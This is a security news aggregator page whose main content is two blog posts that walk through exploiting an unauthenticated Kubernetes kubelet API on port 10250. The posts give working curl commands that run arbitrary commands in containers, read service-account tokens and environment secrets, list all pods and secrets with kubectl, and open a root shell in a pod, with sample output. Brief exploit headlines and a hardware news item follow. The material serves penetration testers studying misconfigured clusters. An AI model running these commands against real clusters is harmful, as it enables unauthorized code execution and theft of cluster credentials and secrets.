We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.

We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:
KUBERNETES_PORT=tcp://10.10.10.10:443
or
KUBERNETES_MASTER_NAME: 10.11.12.13:443
Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them. This may be (if we are lucky) another public IP or a 10. IP. If it's a 10. IP we need to download kubectl to the pod.
Assuming it's not in the environment variables let's look and see if they are there in the mounted secrets
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"
sample output truncated:cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
We can then cat out the ca.cert, namespace, and token
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"
Output:
total 4drwxrwxrwt 3 root root 140 Nov 9 16:27 .drwxr-xr-x 3 root root 4.0K Nov 9 16:27 ..lrwxrwxrwx 1 root root 13 Nov 9 16:27 ca.crt -> ..data/ca.crtlrwxrwxrwx 1 root root 16 Nov 9 16:27 namespace -> ..data/namespacelrwxrwxrwx 1 root root 12 Nov 9 16:27 token -> ..data/token
and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:

eyJhbGciOiJSUzI1NiI---SNIP---

Also grab the ca.crt :-)

With the token, ca.crt and api server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces

Output:

NAMESPACE NAME READY STATUS RESTARTS AGE
kube-system event-exporter-v0.1.9-5c-SNIP 2/2 Running 2 120d
kube-system fluentd-cloud-logging-gke-eeme-api-default-pool 1/1 Running 1 2y
kube-system heapster-v1.5.2-5-SNIP 3/3 Running 0 27d
kube-system kube-dns-5b8-SNIP 4/4 Running 0 61d
kube-system kube-dns-autoscaler-2-SNIP 1/1 Running 1 252d
kube-system kube-proxy-gke-eeme-api-default-pool 1/1 Running 1 2y
kube-system kubernetes-dashboard-7-SNIP 1/1 Running 0 27d
kube-system l7-default-backend-10-SNIP 1/1 Running 0 27d
kube-system metrics-server-v0.2.1-7-SNIP 2/2 Running 0 120d

at this point you can pull secrets or exec into any available pods

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get secrets --all-namespaces

to get a shell via kubectl

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --namespace=kube-system

NAME READY STATUS RESTARTS AGE
event-exporter-v0.1.9-5-SNIP 2/2 Running 2 120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f 2/2 Running 0 120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system--server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 .
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 ..
-rwxr-xr-x 1 root root 0 Sep 11 07:25 .dockerenv
drwxr-xr-x 3 root root 4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x 2 root root 12.0K Sep 11 07:24 bin
drwxr-xr-x 5 root root 380 Sep 11 07:25 dev
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 etc
drwxr-xr-x 2 nobody nogroup 4.0K Nov 1 2017 home
-rwxr-xr-x 2 root root 39.2M Dec 20 2017 metrics-server
dr-xr-xr-x 135 root root 0 Sep 11 07:25 proc
drwxr-xr-x 1 root root 4.0K Dec 19 21:33 root
dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys
drwxrwxrwt 1 root root 4.0K Oct 18 13:57 tmp
drwxr-xr-x 3 root root 4.0K Sep 11 07:24 usr
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 var

For completeness if you got the keys via the environment variables the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces

Tags: cloud
6:00
Kubernetes: unauth kublet API 10250 basic code exec
» ‎ Carnal0wnage

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.

Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
# /run/%namespace%/%pod_name%/%container_name%
example:
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"
total 12drwxr-xr-x 13 root root 148 Aug 26 11:31 .drwxr-xr-x 13 root root 148 Aug 26 11:31 ..-rwxr-xr-x 1 root root 0 Aug 26 11:31 .dockerenvdrwxr-xr-x 2 root root 8192 May 5 22:22 bindrwxr-xr-x 5 root root 380 Aug 26 11:31 devdrwxr-xr-x 3 root root 135 Aug 26 11:31 etcdrwxr-xr-x 2 nobody nogroup 6 Mar 18 16:38 homedrwxr-xr-x 2 root root 6 Apr 23 11:17 libdr-xr-xr-x 353 root root 0 Aug 26 07:14 procdrwxr-xr-x 2 root root 6 Mar 18 16:38 rootdr-xr-xr-x 13 root root 0 Aug 26 15:12 sysdrwxrwxrwt 2 root root 6 Mar 18 16:38 tmpdrwxr-xr-x 4 root root 31 Apr 23 11:17 usrdrwxr-xr-x 5 root root 41 Aug 26 11:31 var

Here is how to get all secrets which container uses (environment variables - commons to see kublet tokens here):
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system//" -d "cmd=env"
The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:
$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool
or
$ curl --insecure https://k8s-node-1:10250/runningpods | jq

Example 1:
curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)
Example 2:curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
Unauthorized
Example 3:
curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:
{ "kind": "PodList", "apiVersion": "v1", "metadata": {}, "items": [ { "metadata": { "name": "kube-dns-5b8bf6c4f4-k5n2g", "generateName": "kube-dns-5b8bf6c4f4-", "namespace": "kube-system", "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g", "uid": "63438841-e43c-11e8-a104-42010a80038e", "resourceVersion": "85366060", "creationTimestamp": "2018-11-09T16:27:44Z", "labels": { "k8s-app": "kube-dns", "pod-template-hash": "1646927090" }, "annotations": { "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z", "kubernetes.io/config.source": "api", "scheduler.alpha.kubernetes.io/critical-pod": "" }, "ownerReferences": [ { "apiVersion": "extensions/v1beta1", "kind": "ReplicaSet", "name": "kube-dns-5b8bf6c4f4", "uid": "633db9d4-e43c-11e8-a104-42010a80038e", "controller": true } ] }, "spec": { "volumes": [ { "name": "kube-dns-config", "configMap": { "name": "kube-dns", "defaultMode": 420 } }, { "name": "kube-dns-token-xznw5", "secret": { "secretName": "kube-dns-token-xznw5", "defaultMode": 420 } } ], "containers": [ { "name": "dnsmasq", "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10", "args": [ "-v=2", "-logtostderr", "-configDir=/etc/k8s/dns/dnsmasq-nanny", "-restartDnsmasq=true", "--", "-k", "--cache-size=1000", "--no-negcache", "--log-facility=-", "--server=/cluster.local/127.0.0.1#10053", "--server=/in-addr.arpa/127.0.0.1#10053", "--server=/ip6.arpa/127.0.0.1#10053" ], "ports": [ { "name": "dns", "containerPort": 53, "protocol": "UDP" }, { "name": "dns-tcp", "containerPort": 53, "protocol": "TCP" } ], "resources": { "requests": { "cpu": "150m", "memory": "20Mi" } }, "volumeMounts": [ { "name": "kube-dns-config", "mountPath": "/etc/k8s/dns/dnsmasq-nanny" }, { "name": "kube-dns-token-xznw5", "readOnly": true, "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount" } ], "livenessProbe": { "httpGet": { "path": "/healthcheck/dnsmasq", "port": 10054, "scheme": "HTTP" }, "initialDelaySeconds": 60, "timeoutSeconds": 5, "periodSeconds": 10, "successThreshold": 1, "failureThreshold": 5 }, "terminationMessagePath": "/dev/termination-log", "imagePullPolicy": "IfNotPresent" }, --------SNIP---------
With the output of the running pods command you can craft your command to do the code exec
$ curl -k -XPOST "https://k8s-node-1:10250/run///" -d "cmd=env"
as an example:

leaves you with:
curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"
total 35264drwxr-xr-x 1 root root 4096 Nov 9 16:27 .drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenvdrwxr-xr-x 2 root root 4096 Nov 9 16:27 bindrwxr-xr-x 5 root root 380 Nov 9 16:27 dev-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nannydrwxr-xr-x 1 root root 4096 Nov 9 16:27 etcdrwxr-xr-x 2 root root 4096 Jan 9 2018 homedrwxr-xr-x 5 root root 4096 Nov 9 16:27 libdrwxr-xr-x 5 root root 4096 Nov 9 16:27 mediadrwxr-xr-x 2 root root 4096 Jan 9 2018 mntdr-xr-xr-x 125 root root 0 Nov 9 16:27 procdrwx------ 2 root root 4096 Jan 9 2018 rootdrwxr-xr-x 2 root root 4096 Jan 9 2018 rundrwxr-xr-x 2 root root 4096 Nov 9 16:27 sbindrwxr-xr-x 2 root root 4096 Jan 9 2018 srvdr-xr-xr-x 12 root root 0 Nov 9 16:27 sysdrwxrwxrwt 1 root root 4096 Nov 9 17:00 tmpdrwxr-xr-x 7 root root 4096 Nov 9 16:27 usrdrwxr-xr-x 1 root root 4096 Nov 9 16:27 var
Tags: cloud

5:35
Two Ukrainians Charged With 2016 Hack Of SEC
» ‎ Packet Storm Security Headlines

Two Ukrainians Charged With 2016 Hack Of SEC
Tags: headlinehackergovernmentusacybercrimedata lossfraud
5:35
NanoCore Trojan Is Protected In Memory From Being Killed Off
» ‎ Packet Storm Security Headlines

NanoCore Trojan Is Protected In Memory From Being Killed Off
Tags: headlinemalwaretrojan
5:35
Fortnite Security Issue Would Have Granted Hackers Access To Accounts
» ‎ Packet Storm Security Headlines

Fortnite Security Issue Would Have Granted Hackers Access To Accounts
Tags: headlinehackerprivacyflawpassword
5:35
Yes, You Can Remotely Hack Factory, Building Site Cranes. Wait, What?
» ‎ Packet Storm Security Headlines

Yes, You Can Remotely Hack Factory, Building Site Cranes. Wait, What?
Tags: headlinehackerflawscada

5:33
WordPress Category Page Icons 3.6.1 CSRF / Shell Upload
» ‎ Packet Storm Security Exploits

WordPress category-page-icons plugin version 3.6.1 suffers from cross site request forgery and remote shell upload vulnerabilities.
Tags:
5:33
NTPsec 1.1.2 ntp_control Out-Of-Bounds Read
» ‎ Packet Storm Security Exploits

NTPsec version 1.1.2 suffers from an out-of-bounds read vulnerability in ntp_control.
Tags:

5:33
WordPress Category Page Icons 3.6.1 CSRF / Shell Upload
» ‎ Packet Storm Security Recent Files

WordPress category-page-icons plugin version 3.6.1 suffers from cross site request forgery and remote shell upload vulnerabilities.
Tags:
5:33
NTPsec 1.1.2 ntp_control Out-Of-Bounds Read
» ‎ Packet Storm Security Recent Files

NTPsec version 1.1.2 suffers from an out-of-bounds read vulnerability in ntp_control.
Tags:

5:33
WordPress Category Page Icons 3.6.1 CSRF / Shell Upload
» ‎ Packet Storm Security Misc. Files

WordPress category-page-icons plugin version 3.6.1 suffers from cross site request forgery and remote shell upload vulnerabilities.
Tags:
5:33
NTPsec 1.1.2 ntp_control Out-Of-Bounds Read
» ‎ Packet Storm Security Misc. Files

NTPsec version 1.1.2 suffers from an out-of-bounds read vulnerability in ntp_control.
Tags:

5:03
NTPsec 1.1.2 config Out-Of-Bounds Write
» ‎ Packet Storm Security Exploits

NTPsec version 1.1.2 suffer from a config related out-of-bounds write vulnerability.
Tags:
4:12
NTPsec 1.1.2 ctl_getitem Out-Of-Bounds Read
» ‎ Packet Storm Security Exploits

NTPsec version 1.1.2 suffers from an out-of-bounds read vulnerability in ctl_getitem.
Tags:

4:12
NTPsec 1.1.2 ctl_getitem Out-Of-Bounds Read
» ‎ Packet Storm Security Recent Files

NTPsec version 1.1.2 suffers from an out-of-bounds read vulnerability in ctl_getitem.
Tags:

4:12
NTPsec 1.1.2 ctl_getitem Out-Of-Bounds Read
» ‎ Packet Storm Security Misc. Files

NTPsec version 1.1.2 suffers from an out-of-bounds read vulnerability in ctl_getitem.
Tags:

4:00
No Keyboard Needed, this Laptop is all Screens
» ‎ Hack a Day

If you have an eye for obscure Microsoft products, you may be aware of the Microsoft PixelSense, a table-sized horizontal touchscreen designed as a collaborative workspace. It’s a multi-user computer with no traditional keyboard or mouse, instead multiple users work with documents and other files as though they were real documents on a table. It’s an impressive piece of technology, and it was the first thing that came to mind when we saw [Anitomicals C]’s dual screen portable computer. It has a form factor similar to a large laptop, in which the touchscreen folds upwards to reveal not a conventional …read more

Tags: computer hacks

2:11
WordPress 2013 TwentyThirteen Theme 5.0.3 Open Redirection
» ‎ Packet Storm Security Exploits

WordPress 2013 TwentyThirteen theme version 5.0.3 suffers from an open redirection vulnerability.
Tags:

2:11
WordPress 2013 TwentyThirteen Theme 5.0.3 Open Redirection
» ‎ Packet Storm Security Recent Files

WordPress 2013 TwentyThirteen theme version 5.0.3 suffers from an open redirection vulnerability.
Tags:

Skip to page: 1 2 3 4 ... 865

Feeds

Recent items

Tags:

Tags:

Tags:

Tags:

Tags: cons

Tags: headlineprivacydata lossflawtwitter

Tags: headlineprivacymicrosoftdata loss

Tags: headlinedatabaseflawpatchoracle

Tags: headlinehackermicrosoftflawpatch

Tags: headlinegovernmentprivacyusaflawcryptography

Enclosure: [download]

Tags: hackaday Columns

Tags: home hacks

Tags:

Tags:

Tags:

Tags: engineering

Tags:

Tags:

Tags:

Tags: attiny hacks

Tags:

Tags:

Tags:

Tags: Wireless hacks

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags: Wireless hacks

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags: home hacks

Tags:

Tags:

Tags:

Tags: raspberry

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags:

Tags: